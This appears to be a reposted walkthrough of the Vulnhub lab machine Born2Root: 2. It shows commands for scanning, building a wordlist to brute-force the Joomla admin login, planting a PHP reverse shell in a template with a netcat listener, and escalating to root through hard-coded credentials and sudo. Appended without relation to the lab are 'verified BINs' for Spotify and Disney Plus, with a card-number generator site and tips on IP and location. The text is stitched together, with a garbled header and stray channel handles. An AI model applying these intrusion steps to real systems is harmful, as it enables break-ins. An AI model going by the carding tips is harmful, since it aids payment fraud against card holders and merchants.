β β β Uππ»βΊπ«Δπ¬πβ β β β
Born2Root: 2: Vulnhub Walkthrough
Penetration Methodology:
-Scanning
-Enumeration
-Exploitation
-Privilege Escalation
-Capture the Flag
Walkthrough:
1) Let's start by scanning the network to find our target.
netdiscover
2) We found our target: 192.168.1.9
3) Time to scan the target's IP with nmap. The scan shows three major ports open: 22 (SSH), 80 (HTTP) and 111 (RPC).
nmap -A 192.168.1.9
4) Since port 80 is running HTTP, we opened the target's IP address in the browser. This gives us an attractive-looking webpage, but after spending a considerable amount of time on it we found that it is nothing but a distraction; there is nothing of importance on the site itself.
> So we moved on to directory brute-forcing to get some hints. The dirb scan reveals a joomla directory. This is the major breakthrough: now it's time to exploit the machine through Joomla.
> dirb http://192.168.1.9/
5) Now that we have found the joomla directory, we browse to it. Here we have a blog made by the author, titled Tim's Blog. This could be a hint for a username, so let's keep it in mind. There is also a login form at the bottom right, so we will have to guess the user credentials.
6) By convention, we try the default credentials first. A quick search tells us that the default administrator username for Joomla is "admin". For the password we will perform a dictionary attack, building the dictionary from the words present on the blog itself with cewl.
> cewl http://192.168.1.9/joomla/ > dict.txt
7) With the dictionary dict.txt ready, it's time to brute-force the login. We used Burp Suite's Intruder for this, with dict.txt as the payload list for the password field. The brute force gives us "travel" as the password.
> Now we use these credentials to log in to Joomla:
Username: admin
Password: travel
8) Now that we are logged in to Joomla as the Super User, we will use a PHP reverse shell to get a foothold on the server; Kali Linux ships one at /usr/share/webshells/php/php-reverse-shell.php. Go to the template section: click Extensions in the menu, open Templates, go into the beez3 template and choose Customise. This opens an editor as shown in the image. Select index.php and replace its contents with the reverse shell, remembering to change the IP address and port to those of your listener.
9) After editing index.php, save the file by clicking the Save button. index.php now contains our reverse shell script. Before triggering it we need a listener to catch the connection, so we start one with netcat as shown in the image below; then we run index.php by loading it in the browser.
10) After we got the shell, now it was time to enumerate the ma
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
cd /opt
ls
cd scripts
ls
cat fileshare.py
The listener (nc -lvp 1234) catches the reverse shell, and the python one-liner upgrades it to an interactive TTY. Enumerating /opt/scripts we find fileshare.py, which contains hard-coded credentials. After finding the credentials, all that was left was to log in as Tim with su, using the following credentials:
Username: tim
Password: lulzlol
11) After logging in as Tim, we ran sudo -l to list the sudo rights of the user tim. As we can see in the given image, tim has all permissions, i.e. he can run any command as root through sudo. So we switched to root with sudo su, changed into /root with cd, and found the final flag there.
su tim
sudo -l
sudo su
cd /root
ls
cat flag.txt
enjoy
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
SOME VERIFIED BINS:
> Bin Spotify
531443331xxxxxxxx
IP: Netherlands
Change payment to Egypt
https://namso-gen.com/
> Bin Disney Plus
Bin: 6501597230xxxxxxx
Date: Rnd
CVV: Rnd
IP: USA
Zip code: 10001/10080
USE FOR LEARN